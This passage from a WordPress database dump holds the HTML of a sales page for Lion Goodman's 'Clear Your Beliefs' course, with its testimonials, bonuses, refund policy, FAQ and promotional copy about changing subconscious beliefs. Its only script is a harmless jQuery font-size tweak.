God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:24:53', '2014-06-19 06:24:53', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1042, 2, '2014-06-19 01:48:14', '2014-06-19 06:48:14', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were 